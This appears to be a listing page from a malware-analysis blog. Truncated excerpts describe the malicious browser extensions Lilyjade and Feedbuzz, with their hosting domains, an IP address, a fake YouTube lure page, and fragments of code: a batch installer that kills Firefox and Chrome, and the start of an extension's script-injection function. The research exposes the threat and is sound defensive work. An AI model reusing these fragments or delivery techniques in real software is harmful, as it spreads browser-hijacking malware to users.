I was looking at some of the files being installed from a recent posting, when I found something interesting. It looks like someone else is trying out lilyjade. The extensions are held in a self extracting archive and installed via a batch file. @echo off //Kill Proccess TASKKILL /F /IM firefox.exe TASKKILL /F /IM chrome.exeRead more...
lilyjadev2.com (Malicious browser extension Hosted in the United States by Endicott H4y Technologies Llc)
After posting the latest browser extension malware, I decided to check up on the first posted on the site, Lilyjade. While all of the reported hosts had been shutdown, I located a new one, which claimed to host Lilyjade version 2 Here’s a look at the new version of the Lilyjade malware The first changeRead more...
Feedbuzz.info (Malicious browser extension Hosted in Canada by Sarah Ryan)
Resolved Feedbuzz.info to 184.107.233.186 The extension comes in both firefox and chrome flavors Initial loading comes from a fake youtube page, http://video8244.uni.me The page is loaded from a dropbox account (/u/95827902/), and the extensions are loaded from epicrewards.net Here is the firefox extension source loadScript_you(); function loadScript_you() { if ('https:' == document.location.protocol) return false; varRead more...